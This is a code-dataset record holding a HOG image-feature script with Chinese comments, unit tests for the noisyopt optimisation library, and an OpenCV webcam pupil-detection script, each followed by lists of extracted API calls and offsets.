gradient_values_x = cv2.Sobel(img, cv2.CV_64F, 1, 0, ksize=1)
gradient_values_y = cv2.Sobel(img, cv2.CV_64F, 0, 1, ksize=1)
mag, angle = cv2.cartToPolar(gradient_values_x, gradient_values_y, angleInDegrees=True)
#angle範圍會為0~360之間,但我們只要0~180度
for i in range(angle.shape[0]):
for j in range(angle.shape[1]):
if(angle[i][j] > 180):
angle[i][j] = angle[i][j] - 180
'''
#顯示Compute_Sobel後的影像
while True:
abs_x = abs(gradient_values_x)
abs_x = np.uint8(abs_x)
cv2.namedWindow("gradient_values_x",0)
cv2.resizeWindow("gradient_values_x", 256, 512)
cv2.imshow("gradient_values_x",abs_x)
abs_y = abs(gradient_values_y)
abs_y = np.uint8(abs_y)
cv2.namedWindow("gradient_values_y",0)
cv2.resizeWindow("gradient_values_y", 256, 512)
cv2.imshow("gradient_values_y",abs_y)
mag_uint8 = np.uint8(mag)
cv2.namedWindow("mag",0)
cv2.resizeWindow("mag", 256, 512)
cv2.imshow("mag",mag_uint8)
k = cv2.waitKey(0)
if k == 27:
#按Esc
cv2.destroyAllWindows()
break
'''
return mag, angle
#Image_Pretreatment影像預處理
def Image_Pretreatment(img):
#resize調整大小
img_resize = cv2.resize(img, (64,128), interpolation=cv2.INTER_CUBIC)
img_resize_32 = np.float32(img_resize)
'''
#顯示影像
cv2.namedWindow("Resize",0)
cv2.resizeWindow("Resize", 256, 512)
cv2.imshow("Resize",img_resize)
cv2.waitKey(0)
cv2.destroyAllWindows()
'''
#預處理(一)強度除以最大值
#img_after = (img_resize_32/np.max(img_resize_32))
#預處理(二)強度除以255
#img_after = (img_resize_32/255)
#預處理(三)gamma函式
#img_after = np.power(img_resize_32,0.9)
'''
img_after_uint8 = np.uint8(img_after)
cv2.namedWindow("img_after",0)
cv2.resizeWindow("img_after", 256, 512)
cv2.imshow("img_after", img_after_uint8)
cv2.waitKey(0)
cv2.destroyAllWindows()
'''
#return img_after
return img_resize_32
#Histogram_of_Oriented_Gradients梯度方向直方圖
def Histogram_of_Oriented_Gradients():
#讀取灰階圖
img = cv2.imread(input_image_path,0)
#Image_Pretreatment影像預處理
img_finshed = Image_Pretreatment(img)
#計算Sobel
mag, angle = Compute_Sobel(img_finshed)
#計算Cell
cell_gradient_box = Computer_Cell(mag, angle)
#計算Block
hog_vector = Compute_Block(cell_gradient_box)
return hog_vector
if __name__ == '__main__':
#input_image_path = (r'路徑\檔名.png')
this_file_path = os.getcwd() #讀取當前資料夾位置
#input_image_path = (r'{}\running_man_1.png'.format(this_file_path))
input_image_path = (r'{}\running_man_2.png'.format(this_file_path))
#input_image_path = (r'{}\running_man_3.png'.format(this_file_path))
#input_image_path = (r'{}\running_man_4.png'.format(this_file_path))
#input_image_path = (r'{}\running_man_5.png'.format(this_file_path))
#input_image_path = (r'{}\running_man_6.png'.format(this_file_path))
#input_image_path = (r'{}\running_man_7.png'.format(this_file_path))
#input_image_path = (r'{}\landscape.png'.format(this_file_path))
#參數
bin_size = 9
cell_size = 8
#執行程式
hog_vector = Histogram_of_Oriented_Gradients() #輸出為hog_vector
#print輸出長度
print ("輸出HOG長度為{}".format(hog_vector.shape[0]))
#將HOG輸出特徵向量可視化
x = np.arange(hog_vector.shape[0])
plt.title('HOG')
plt.bar(x,hog_vector,color='red')
#plt.savefig(r'{}\running_man_1_result.png'.format(this_file_path))
#plt.savefig(r'路徑\檔名.png')
plt.show()
|
[
"numpy.arange",
"numpy.power",
"cv2.cartToPolar",
"os.getcwd",
"numpy.zeros",
"matplotlib.pyplot.bar",
"numpy.concatenate",
"matplotlib.pyplot.title",
"cv2.resize",
"cv2.imread",
"numpy.float32",
"cv2.Sobel",
"matplotlib.pyplot.show"
] |
[((141, 238), 'numpy.zeros', 'np.zeros', (['(bin_size * 4 * (cell_gradient_box.shape[0] - 1) * (cell_gradient_box.shape\n [1] - 1))'], {}), '(bin_size * 4 * (cell_gradient_box.shape[0] - 1) * (\n cell_gradient_box.shape[1] - 1))\n', (149, 238), True, 'import numpy as np\n'), ((1537, 1555), 'numpy.zeros', 'np.zeros', (['bin_size'], {}), '(bin_size)\n', (1545, 1555), True, 'import numpy as np\n'), ((3617, 3658), 'cv2.Sobel', 'cv2.Sobel', (['img', 'cv2.CV_64F', '(1)', '(0)'], {'ksize': '(1)'}), '(img, cv2.CV_64F, 1, 0, ksize=1)\n', (3626, 3658), False, 'import cv2\n'), ((3684, 3725), 'cv2.Sobel', 'cv2.Sobel', (['img', 'cv2.CV_64F', '(0)', '(1)'], {'ksize': '(1)'}), '(img, cv2.CV_64F, 0, 1, ksize=1)\n', (3693, 3725), False, 'import cv2\n'), ((3746, 3820), 'cv2.cartToPolar', 'cv2.cartToPolar', (['gradient_values_x', 'gradient_values_y'], {'angleInDegrees': '(True)'}), '(gradient_values_x, gradient_values_y, angleInDegrees=True)\n', (3761, 3820), False, 'import cv2\n'), ((4971, 5028), 'cv2.resize', 'cv2.resize', (['img', '(64, 128)'], {'interpolation': 'cv2.INTER_CUBIC'}), '(img, (64, 128), interpolation=cv2.INTER_CUBIC)\n', (4981, 5028), False, 'import cv2\n'), ((5049, 5071), 'numpy.float32', 'np.float32', (['img_resize'], {}), '(img_resize)\n', (5059, 5071), True, 'import numpy as np\n'), ((5889, 5920), 'cv2.imread', 'cv2.imread', (['input_image_path', '(0)'], {}), '(input_image_path, 0)\n', (5899, 5920), False, 'import cv2\n'), ((6339, 6350), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (6348, 6350), False, 'import os\n'), ((7200, 7230), 'numpy.arange', 'np.arange', (['hog_vector.shape[0]'], {}), '(hog_vector.shape[0])\n', (7209, 7230), True, 'import numpy as np\n'), ((7236, 7252), 'matplotlib.pyplot.title', 'plt.title', (['"""HOG"""'], {}), "('HOG')\n", (7245, 7252), True, 'import matplotlib.pyplot as plt\n'), ((7258, 7293), 'matplotlib.pyplot.bar', 'plt.bar', (['x', 'hog_vector'], {'color': '"""red"""'}), "(x, hog_vector, color='red')\n", (7265, 7293), True, 'import matplotlib.pyplot as plt\n'), ((7403, 7413), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (7411, 7413), True, 'import matplotlib.pyplot as plt\n'), ((371, 507), 'numpy.concatenate', 'np.concatenate', (['[cell_gradient_box[i][j], cell_gradient_box[i][j + 1], cell_gradient_box[i +\n 1][j], cell_gradient_box[i + 1][j + 1]]'], {}), '([cell_gradient_box[i][j], cell_gradient_box[i][j + 1],\n cell_gradient_box[i + 1][j], cell_gradient_box[i + 1][j + 1]])\n', (385, 507), True, 'import numpy as np\n'), ((877, 899), 'numpy.power', 'np.power', (['L2_norm', '(0.5)'], {}), '(L2_norm, 0.5)\n', (885, 899), True, 'import numpy as np\n'), ((924, 943), 'numpy.power', 'np.power', (['(0.0001)', '(2)'], {}), '(0.0001, 2)\n', (932, 943), True, 'import numpy as np\n')]
|
import numpy as np
import numpy.testing as npt
import noisyopt
def test_minimize():
deltatol = 1e-3
## basic testing without stochasticity
def quadratic(x):
return (x**2).sum()
res = noisyopt.minimize(quadratic, np.asarray([0.5, 1.0]), deltatol=deltatol)
npt.assert_allclose(res.x, [0.0, 0.0], atol=deltatol)
npt.assert_equal(res.free, [False, False])
res = noisyopt.minimize(quadratic, np.asarray([2.5, -3.2]), deltatol=deltatol)
npt.assert_allclose(res.x, [0.0, 0.0], atol=deltatol)
npt.assert_equal(res.free, [False, False])
res = noisyopt.minimize(quadratic, np.asarray([2.5, -3.2, 0.9, 10.0, -0.3]),
deltatol=deltatol)
npt.assert_allclose(res.x, np.zeros(5), atol=deltatol)
npt.assert_equal(res.free, [False, False, False, False, False])
## test bound handling
res = noisyopt.minimize(quadratic, np.asarray([0.5, 0.5]),
bounds=np.asarray([[0, 1], [0, 1]]), deltatol=deltatol)
npt.assert_allclose(res.x, [0.0, 0.0], atol=deltatol)
npt.assert_equal(res.free, [False, False])
res = noisyopt.minimize(quadratic, np.asarray([0.8, 0.8]),
bounds=np.asarray([[0.5, 1], [0.5, 1]]),
deltatol=deltatol)
npt.assert_allclose(res.x, [0.5, 0.5], atol=deltatol)
npt.assert_equal(res.free, [False, False])
## test determination of unconstrained variables
def quadratic_except_last(x):
return (x[:-1]**2).sum()
res = noisyopt.minimize(quadratic_except_last, np.asarray([0.5, 1.0]))
npt.assert_approx_equal(res.x[0], 0.0)
npt.assert_equal(res.free, [False, True])
## test errorcontrol for stochastic function
def stochastic_quadratic(x, seed=None):
prng = np.random if seed is None else np.random.RandomState(seed)
return (x**2).sum() + prng.randn(1) + 0.5*np.random.randn(1)
deltatol = 0.5
# test unpaired
res = noisyopt.minimize(stochastic_quadratic, np.array([4.55, 3.0]),
deltainit=2.0, deltatol=deltatol,
errorcontrol=True)
npt.assert_allclose(res.x, [0.0, 0.0], atol=deltatol)
npt.assert_equal(res.free, [False, False])
# test paired
res = noisyopt.minimize(stochastic_quadratic, np.array([4.55, 3.0]),
deltainit=2.0, deltatol=deltatol,
errorcontrol=True, paired=True)
npt.assert_allclose(res.x, [0.0, 0.0], atol=deltatol)
npt.assert_equal(res.free, [False, False])
def test_bisect():
xtol = 1e-6
## simple tests
root = noisyopt.bisect(lambda x: x, -2, 2, xtol=xtol)
npt.assert_allclose(root, 0.0, atol=xtol)
root = noisyopt.bisect(lambda x: x-1, -2, 2, xtol=xtol)
npt.assert_allclose(root, 1.0, atol=xtol)
## extrapolate if 0 outside of interval
root = noisyopt.bisect(lambda x: x, 1, 2, xtol=xtol)
npt.assert_allclose(root, 0.0, atol=xtol)
npt.assert_raises(noisyopt.BisectException,
noisyopt.bisect, lambda x: x, 1, 2,
xtol=xtol, outside='raise')
## extrapolate with nonlinear function
root = noisyopt.bisect(lambda x: x+x**2, 1.0, 2, xtol=xtol)
assert root < 1.0
## test with stochastic function
xtol = 1e-1
func = lambda x: x - 0.25 + np.random.normal(scale=0.01)
root = noisyopt.bisect(noisyopt.AveragedFunction(func), -2, 2, xtol=xtol,
errorcontrol=True)
npt.assert_allclose(root, 0.25, atol=xtol)
def test_AveragedFunction():
## averaging a simple function
func = lambda x: np.asarray(x).sum()
avfunc = noisyopt.AveragedFunction(func, N=30)
av, avse = avfunc([1.0, 1.0])
npt.assert_equal(av, 2.0)
npt.assert_equal(avse, 0.0)
# se of function value difference between two points is zero
# (as function evaluation is not stochastic)
diffse = avfunc.diffse([1.0, 1.0], [2.0, 1.0])
npt.assert_equal(diffse, 0.0)
## changing the number of evaluations
avfunc.N *= 2
npt.assert_equal(avfunc.N, 60)
## averaging a stochastic function
func = lambda x: np.asarray(x).sum() + np.random.randn()
avfunc = noisyopt.AveragedFunction(func, N=30)
# check that reevaluation gives the same thing due to caching
av30_1, avse30_1 = avfunc([1.0, 1.0])
av30_2, avse30_2 = avfunc([1.0, 1.0])
npt.assert_equal(av30_1, av30_2)
npt.assert_equal(avse30_1, avse30_2)
# check that se decreases if
avfunc.N *= 2
av60, avse60 = avfunc([1.0, 1.0])
assert av30_1 != av60
assert avse30_1 > avse60
# test with floating point N
noisyopt.AveragedFunction(func, N=30.0, paired=True)
if __name__ == '__main__':
npt.run_module_suite()
|
[
"numpy.random.normal",
"numpy.testing.assert_equal",
"numpy.testing.assert_approx_equal",
"numpy.testing.assert_allclose",
"numpy.testing.assert_raises",
"numpy.asarray",
"noisyopt.bisect",
"numpy.array",
"numpy.zeros",
"numpy.testing.run_module_suite",
"numpy.random.randn",
"noisyopt.AveragedFunction",
"numpy.random.RandomState"
] |
[((285, 338), 'numpy.testing.assert_allclose', 'npt.assert_allclose', (['res.x', '[0.0, 0.0]'], {'atol': 'deltatol'}), '(res.x, [0.0, 0.0], atol=deltatol)\n', (304, 338), True, 'import numpy.testing as npt\n'), ((343, 385), 'numpy.testing.assert_equal', 'npt.assert_equal', (['res.free', '[False, False]'], {}), '(res.free, [False, False])\n', (359, 385), True, 'import numpy.testing as npt\n'), ((474, 527), 'numpy.testing.assert_allclose', 'npt.assert_allclose', (['res.x', '[0.0, 0.0]'], {'atol': 'deltatol'}), '(res.x, [0.0, 0.0], atol=deltatol)\n', (493, 527), True, 'import numpy.testing as npt\n'), ((532, 574), 'numpy.testing.assert_equal', 'npt.assert_equal', (['res.free', '[False, False]'], {}), '(res.free, [False, False])\n', (548, 574), True, 'import numpy.testing as npt\n'), ((767, 830), 'numpy.testing.assert_equal', 'npt.assert_equal', (['res.free', '[False, False, False, False, False]'], {}), '(res.free, [False, False, False, False, False])\n', (783, 830), True, 'import numpy.testing as npt\n'), ((1010, 1063), 'numpy.testing.assert_allclose', 'npt.assert_allclose', (['res.x', '[0.0, 0.0]'], {'atol': 'deltatol'}), '(res.x, [0.0, 0.0], atol=deltatol)\n', (1029, 1063), True, 'import numpy.testing as npt\n'), ((1068, 1110), 'numpy.testing.assert_equal', 'npt.assert_equal', (['res.free', '[False, False]'], {}), '(res.free, [False, False])\n', (1084, 1110), True, 'import numpy.testing as npt\n'), ((1295, 1348), 'numpy.testing.assert_allclose', 'npt.assert_allclose', (['res.x', '[0.5, 0.5]'], {'atol': 'deltatol'}), '(res.x, [0.5, 0.5], atol=deltatol)\n', (1314, 1348), True, 'import numpy.testing as npt\n'), ((1353, 1395), 'numpy.testing.assert_equal', 'npt.assert_equal', (['res.free', '[False, False]'], {}), '(res.free, [False, False])\n', (1369, 1395), True, 'import numpy.testing as npt\n'), ((1598, 1636), 'numpy.testing.assert_approx_equal', 'npt.assert_approx_equal', (['res.x[0]', '(0.0)'], {}), '(res.x[0], 0.0)\n', (1621, 1636), True, 'import numpy.testing as npt\n'), ((1641, 1682), 'numpy.testing.assert_equal', 'npt.assert_equal', (['res.free', '[False, True]'], {}), '(res.free, [False, True])\n', (1657, 1682), True, 'import numpy.testing as npt\n'), ((2146, 2199), 'numpy.testing.assert_allclose', 'npt.assert_allclose', (['res.x', '[0.0, 0.0]'], {'atol': 'deltatol'}), '(res.x, [0.0, 0.0], atol=deltatol)\n', (2165, 2199), True, 'import numpy.testing as npt\n'), ((2204, 2246), 'numpy.testing.assert_equal', 'npt.assert_equal', (['res.free', '[False, False]'], {}), '(res.free, [False, False])\n', (2220, 2246), True, 'import numpy.testing as npt\n'), ((2464, 2517), 'numpy.testing.assert_allclose', 'npt.assert_allclose', (['res.x', '[0.0, 0.0]'], {'atol': 'deltatol'}), '(res.x, [0.0, 0.0], atol=deltatol)\n', (2483, 2517), True, 'import numpy.testing as npt\n'), ((2522, 2564), 'numpy.testing.assert_equal', 'npt.assert_equal', (['res.free', '[False, False]'], {}), '(res.free, [False, False])\n', (2538, 2564), True, 'import numpy.testing as npt\n'), ((2634, 2680), 'noisyopt.bisect', 'noisyopt.bisect', (['(lambda x: x)', '(-2)', '(2)'], {'xtol': 'xtol'}), '(lambda x: x, -2, 2, xtol=xtol)\n', (2649, 2680), False, 'import noisyopt\n'), ((2685, 2726), 'numpy.testing.assert_allclose', 'npt.assert_allclose', (['root', '(0.0)'], {'atol': 'xtol'}), '(root, 0.0, atol=xtol)\n', (2704, 2726), True, 'import numpy.testing as npt\n'), ((2739, 2789), 'noisyopt.bisect', 'noisyopt.bisect', (['(lambda x: x - 1)', '(-2)', '(2)'], {'xtol': 'xtol'}), '(lambda x: x - 1, -2, 2, xtol=xtol)\n', (2754, 2789), False, 'import noisyopt\n'), ((2792, 2833), 'numpy.testing.assert_allclose', 'npt.assert_allclose', (['root', '(1.0)'], {'atol': 'xtol'}), '(root, 1.0, atol=xtol)\n', (2811, 2833), True, 'import numpy.testing as npt\n'), ((2890, 2935), 'noisyopt.bisect', 'noisyopt.bisect', (['(lambda x: x)', '(1)', '(2)'], {'xtol': 'xtol'}), '(lambda x: x, 1, 2, xtol=xtol)\n', (2905, 2935), False, 'import noisyopt\n'), ((2940, 2981), 'numpy.testing.assert_allclose', 'npt.assert_allclose', (['root', '(0.0)'], {'atol': 'xtol'}), '(root, 0.0, atol=xtol)\n', (2959, 2981), True, 'import numpy.testing as npt\n'), ((2986, 3097), 'numpy.testing.assert_raises', 'npt.assert_raises', (['noisyopt.BisectException', 'noisyopt.bisect', '(lambda x: x)', '(1)', '(2)'], {'xtol': 'xtol', 'outside': '"""raise"""'}), "(noisyopt.BisectException, noisyopt.bisect, lambda x: x, 1,\n 2, xtol=xtol, outside='raise')\n", (3003, 3097), True, 'import numpy.testing as npt\n'), ((3197, 3253), 'noisyopt.bisect', 'noisyopt.bisect', (['(lambda x: x + x ** 2)', '(1.0)', '(2)'], {'xtol': 'xtol'}), '(lambda x: x + x ** 2, 1.0, 2, xtol=xtol)\n', (3212, 3253), False, 'import noisyopt\n'), ((3515, 3557), 'numpy.testing.assert_allclose', 'npt.assert_allclose', (['root', '(0.25)'], {'atol': 'xtol'}), '(root, 0.25, atol=xtol)\n', (3534, 3557), True, 'import numpy.testing as npt\n'), ((3678, 3715), 'noisyopt.AveragedFunction', 'noisyopt.AveragedFunction', (['func'], {'N': '(30)'}), '(func, N=30)\n', (3703, 3715), False, 'import noisyopt\n'), ((3754, 3779), 'numpy.testing.assert_equal', 'npt.assert_equal', (['av', '(2.0)'], {}), '(av, 2.0)\n', (3770, 3779), True, 'import numpy.testing as npt\n'), ((3784, 3811), 'numpy.testing.assert_equal', 'npt.assert_equal', (['avse', '(0.0)'], {}), '(avse, 0.0)\n', (3800, 3811), True, 'import numpy.testing as npt\n'), ((3983, 4012), 'numpy.testing.assert_equal', 'npt.assert_equal', (['diffse', '(0.0)'], {}), '(diffse, 0.0)\n', (3999, 4012), True, 'import numpy.testing as npt\n'), ((4078, 4108), 'numpy.testing.assert_equal', 'npt.assert_equal', (['avfunc.N', '(60)'], {}), '(avfunc.N, 60)\n', (4094, 4108), True, 'import numpy.testing as npt\n'), ((4223, 4260), 'noisyopt.AveragedFunction', 'noisyopt.AveragedFunction', (['func'], {'N': '(30)'}), '(func, N=30)\n', (4248, 4260), False, 'import noisyopt\n'), ((4415, 4447), 'numpy.testing.assert_equal', 'npt.assert_equal', (['av30_1', 'av30_2'], {}), '(av30_1, av30_2)\n', (4431, 4447), True, 'import numpy.testing as npt\n'), ((4452, 4488), 'numpy.testing.assert_equal', 'npt.assert_equal', (['avse30_1', 'avse30_2'], {}), '(avse30_1, avse30_2)\n', (4468, 4488), True, 'import numpy.testing as npt\n'), ((4672, 4724), 'noisyopt.AveragedFunction', 'noisyopt.AveragedFunction', (['func'], {'N': '(30.0)', 'paired': '(True)'}), '(func, N=30.0, paired=True)\n', (4697, 4724), False, 'import noisyopt\n'), ((4757, 4779), 'numpy.testing.run_module_suite', 'npt.run_module_suite', ([], {}), '()\n', (4777, 4779), True, 'import numpy.testing as npt\n'), ((238, 260), 'numpy.asarray', 'np.asarray', (['[0.5, 1.0]'], {}), '([0.5, 1.0])\n', (248, 260), True, 'import numpy as np\n'), ((426, 449), 'numpy.asarray', 'np.asarray', (['[2.5, -3.2]'], {}), '([2.5, -3.2])\n', (436, 449), True, 'import numpy as np\n'), ((615, 655), 'numpy.asarray', 'np.asarray', (['[2.5, -3.2, 0.9, 10.0, -0.3]'], {}), '([2.5, -3.2, 0.9, 10.0, -0.3])\n', (625, 655), True, 'import numpy as np\n'), ((735, 746), 'numpy.zeros', 'np.zeros', (['(5)'], {}), '(5)\n', (743, 746), True, 'import numpy as np\n'), ((898, 920), 'numpy.asarray', 'np.asarray', (['[0.5, 0.5]'], {}), '([0.5, 0.5])\n', (908, 920), True, 'import numpy as np\n'), ((1151, 1173), 'numpy.asarray', 'np.asarray', (['[0.8, 0.8]'], {}), '([0.8, 0.8])\n', (1161, 1173), True, 'import numpy as np\n'), ((1570, 1592), 'numpy.asarray', 'np.asarray', (['[0.5, 1.0]'], {}), '([0.5, 1.0])\n', (1580, 1592), True, 'import numpy as np\n'), ((2010, 2031), 'numpy.array', 'np.array', (['[4.55, 3.0]'], {}), '([4.55, 3.0])\n', (2018, 2031), True, 'import numpy as np\n'), ((2315, 2336), 'numpy.array', 'np.array', (['[4.55, 3.0]'], {}), '([4.55, 3.0])\n', (2323, 2336), True, 'import numpy as np\n'), ((3414, 3445), 'noisyopt.AveragedFunction', 'noisyopt.AveragedFunction', (['func'], {}), '(func)\n', (3439, 3445), False, 'import noisyopt\n'), ((957, 985), 'numpy.asarray', 'np.asarray', (['[[0, 1], [0, 1]]'], {}), '([[0, 1], [0, 1]])\n', (967, 985), True, 'import numpy as np\n'), ((1210, 1242), 'numpy.asarray', 'np.asarray', (['[[0.5, 1], [0.5, 1]]'], {}), '([[0.5, 1], [0.5, 1]])\n', (1220, 1242), True, 'import numpy as np\n'), ((1823, 1850), 'numpy.random.RandomState', 'np.random.RandomState', (['seed'], {}), '(seed)\n', (1844, 1850), True, 'import numpy as np\n'), ((3358, 3386), 'numpy.random.normal', 'np.random.normal', ([], {'scale': '(0.01)'}), '(scale=0.01)\n', (3374, 3386), True, 'import numpy as np\n'), ((4192, 4209), 'numpy.random.randn', 'np.random.randn', ([], {}), '()\n', (4207, 4209), True, 'import numpy as np\n'), ((1901, 1919), 'numpy.random.randn', 'np.random.randn', (['(1)'], {}), '(1)\n', (1916, 1919), True, 'import numpy as np\n'), ((3645, 3658), 'numpy.asarray', 'np.asarray', (['x'], {}), '(x)\n', (3655, 3658), True, 'import numpy as np\n'), ((4170, 4183), 'numpy.asarray', 'np.asarray', (['x'], {}), '(x)\n', (4180, 4183), True, 'import numpy as np\n')]
|
# import lib.pbcvt as pbcvt
import cv2
import numpy as np
import sys
from time import time
def distance(o1, o2):
(x1,y1,w1,h1) = o1
(x2,y2,w2,h2) = o2
c1 = (x1+w1/2,y1+h1/2)
c2 = (x2+w2/2,y2+h2/2)
return np.hypot(c1[0]-c2[0],c1[1]-c2[1])
cv2.namedWindow("preview")
cv2.namedWindow("preview2")
cv2.namedWindow("preview3")
vc = cv2.VideoCapture(int(sys.argv[1]))
vc.set(3,int(sys.argv[2]))
vc.set(4,int(sys.argv[3]))
print(vc.get(3))
print(vc.get(4))
# vout = None
# if (int(sys.argv[5])):
# fourcc = cv2.VideoWriter_fourcc(*'x264')
# vout = cv2.VideoWriter('pupiltest.mp4', fourcc, 24.0, (int(vc.get(3)),int(vc.get(4))))
if vc.isOpened(): # try to get the first frame
rval, frame = vc.read()
else:
rval = False
ptime = time()
nf = 0
# face_cascade = cv2.CascadeClassifier('trained/haarcascade_frontalface_default.xml')
eye_cascade = cv2.CascadeClassifier('trained/haarcascade_eye.xml')
glass_cascade = cv2.CascadeClassifier('trained/haarcascade_eye_tree_eyeglasses.xml')
reye_cascade = cv2.CascadeClassifier('trained/haarcascade_righteye_2splits.xml')
leye_cascade = cv2.CascadeClassifier('trained/haarcascade_lefteye_2splits.xml')
# face = None
# flost = 0
while rval:
roi_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
equalized = cv2.equalizeHist(roi_gray)
roi_color = frame
# faces = face_cascade.detectMultiScale(gray, 1.3, 5)
# flost = flost+1
# for f in faces:
# if face is not None:
# # print("Face: " + str(distance(f,face)))
# if not (1 < distance(f,face) < 40):
# continue
# face = f
# flost = 0
# if flost < 5 and face is not None:
# (x,y,w,h) = face
# x+=10
# y+=10
# w = int(w*0.85)
# h = int(h*0.5)
# cv2.rectangle(frame,(x,y),(x+w,y+h),(255,0,0),2)
# roi_gray = gray[y:y+h, x:x+w]
# roi_color = frame[y:y+h, x:x+w]
eyes = eye_cascade.detectMultiScale(roi_gray)
for e in eyes:
(ex,ey,ew,eh) = e
# ex += 10
# ey += 10
# ew -= 10
# eh -= 10
cv2.rectangle(roi_color,(ex,ey),(ex+ew,ey+eh),(0,0,255),2)
eye_roi_gray = roi_gray[ey:ey+eh, ex:ex+ew]
eye_roi_color = roi_color[ey:ey+eh, ex:ex+ew]
hist = cv2.calcHist([eye_roi_gray],[0],None,[256],[0,256])
# Define criteria = ( type, max_iter = 10 , epsilon = 1.0 )
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)
# Apply KMeans
compactness,labels,centers = cv2.kmeans(hist,2,None,criteria,100,cv2.KMEANS_RANDOM_CENTERS)
print(np.sqrt(compactness)/10)
print(centers)
# center = pbcvt.findPupil(roi_gray, int(ex), int(ey), int(ew), int(eh))
ret, thresh = cv2.threshold(eye_roi_gray, centers[0]-10, 255, 0)
# thresh = cv2.adaptiveThreshold(eye_roi_gray, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 115, 0)
contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# cv2.drawContours(eye_roi_color, contours, -1, (0,0,255), 3)
for cont in contours:
if len(cont) > 5 and cv2.contourArea(cont) > 1000:
ellipse = cv2.fitEllipse(cont)
cv2.ellipse(eye_roi_color, ellipse, (0,0,255),2)
cv2.circle(eye_roi_color, (int(ellipse[0][0]),int(ellipse[0][1])), 2, (255,0,0), 3)
# cv2.circle(eye_roi_color, center, 2, (0,255,0), 3)
# else:
# face = None
cv2.imshow("preview", roi_gray)
cv2.imshow("preview2", equalized)
cv2.imshow("preview3", thresh)
# if vout:
# vout.write(frame)
nf = nf + 1
if time() - ptime > 5:
print(str(nf/(time()-ptime)))
ptime = time()
nf = 0
key = cv2.waitKey(20)
if key == 27: # exit on ESC
break
elif key == 32:
cv2.imwrite('testimage.png',frame);
rval, frame = vc.read()
cv2.destroyWindow("preview")
cv2.destroyWindow("preview2")
cv2.destroyWindow("preview3")
vc.release()
# if vout:
# vout.release()
|
[
"cv2.rectangle",
"numpy.sqrt",
"cv2.imshow",
"cv2.ellipse",
"cv2.fitEllipse",
"cv2.CascadeClassifier",
"cv2.calcHist",
"cv2.threshold",
"cv2.contourArea",
"numpy.hypot",
"cv2.waitKey",
"cv2.kmeans",
"cv2.equalizeHist",
"cv2.cvtColor",
"time.time",
"cv2.namedWindow",
"cv2.imwrite",
"cv2.destroyWindow",
"cv2.findContours"
] |
[((261, 287), 'cv2.namedWindow', 'cv2.namedWindow', (['"""preview"""'], {}), "('preview')\n", (276, 287), False, 'import cv2\n'), ((288, 315), 'cv2.namedWindow', 'cv2.namedWindow', (['"""preview2"""'], {}), "('preview2')\n", (303, 315), False, 'import cv2\n'), ((316, 343), 'cv2.namedWindow', 'cv2.namedWindow', (['"""preview3"""'], {}), "('preview3')\n", (331, 343), False, 'import cv2\n'), ((759, 765), 'time.time', 'time', ([], {}), '()\n', (763, 765), False, 'from time import time\n'), ((873, 925), 'cv2.CascadeClassifier', 'cv2.CascadeClassifier', (['"""trained/haarcascade_eye.xml"""'], {}), "('trained/haarcascade_eye.xml')\n", (894, 925), False, 'import cv2\n'), ((942, 1010), 'cv2.CascadeClassifier', 'cv2.CascadeClassifier', (['"""trained/haarcascade_eye_tree_eyeglasses.xml"""'], {}), "('trained/haarcascade_eye_tree_eyeglasses.xml')\n", (963, 1010), False, 'import cv2\n'), ((1026, 1091), 'cv2.CascadeClassifier', 'cv2.CascadeClassifier', (['"""trained/haarcascade_righteye_2splits.xml"""'], {}), "('trained/haarcascade_righteye_2splits.xml')\n", (1047, 1091), False, 'import cv2\n'), ((1107, 1171), 'cv2.CascadeClassifier', 'cv2.CascadeClassifier', (['"""trained/haarcascade_lefteye_2splits.xml"""'], {}), "('trained/haarcascade_lefteye_2splits.xml')\n", (1128, 1171), False, 'import cv2\n'), ((3951, 3979), 'cv2.destroyWindow', 'cv2.destroyWindow', (['"""preview"""'], {}), "('preview')\n", (3968, 3979), False, 'import cv2\n'), ((3980, 4009), 'cv2.destroyWindow', 'cv2.destroyWindow', (['"""preview2"""'], {}), "('preview2')\n", (3997, 4009), False, 'import cv2\n'), ((4010, 4039), 'cv2.destroyWindow', 'cv2.destroyWindow', (['"""preview3"""'], {}), "('preview3')\n", (4027, 4039), False, 'import cv2\n'), ((226, 264), 'numpy.hypot', 'np.hypot', (['(c1[0] - c2[0])', '(c1[1] - c2[1])'], {}), '(c1[0] - c2[0], c1[1] - c2[1])\n', (234, 264), True, 'import numpy as np\n'), ((1226, 1265), 'cv2.cvtColor', 'cv2.cvtColor', (['frame', 'cv2.COLOR_BGR2GRAY'], {}), '(frame, cv2.COLOR_BGR2GRAY)\n', (1238, 1265), False, 'import cv2\n'), ((1282, 1308), 'cv2.equalizeHist', 'cv2.equalizeHist', (['roi_gray'], {}), '(roi_gray)\n', (1298, 1308), False, 'import cv2\n'), ((3519, 3550), 'cv2.imshow', 'cv2.imshow', (['"""preview"""', 'roi_gray'], {}), "('preview', roi_gray)\n", (3529, 3550), False, 'import cv2\n'), ((3555, 3588), 'cv2.imshow', 'cv2.imshow', (['"""preview2"""', 'equalized'], {}), "('preview2', equalized)\n", (3565, 3588), False, 'import cv2\n'), ((3593, 3623), 'cv2.imshow', 'cv2.imshow', (['"""preview3"""', 'thresh'], {}), "('preview3', thresh)\n", (3603, 3623), False, 'import cv2\n'), ((3796, 3811), 'cv2.waitKey', 'cv2.waitKey', (['(20)'], {}), '(20)\n', (3807, 3811), False, 'import cv2\n'), ((2108, 2178), 'cv2.rectangle', 'cv2.rectangle', (['roi_color', '(ex, ey)', '(ex + ew, ey + eh)', '(0, 0, 255)', '(2)'], {}), '(roi_color, (ex, ey), (ex + ew, ey + eh), (0, 0, 255), 2)\n', (2121, 2178), False, 'import cv2\n'), ((2288, 2344), 'cv2.calcHist', 'cv2.calcHist', (['[eye_roi_gray]', '[0]', 'None', '[256]', '[0, 256]'], {}), '([eye_roi_gray], [0], None, [256], [0, 256])\n', (2300, 2344), False, 'import cv2\n'), ((2549, 2616), 'cv2.kmeans', 'cv2.kmeans', (['hist', '(2)', 'None', 'criteria', '(100)', 'cv2.KMEANS_RANDOM_CENTERS'], {}), '(hist, 2, None, criteria, 100, 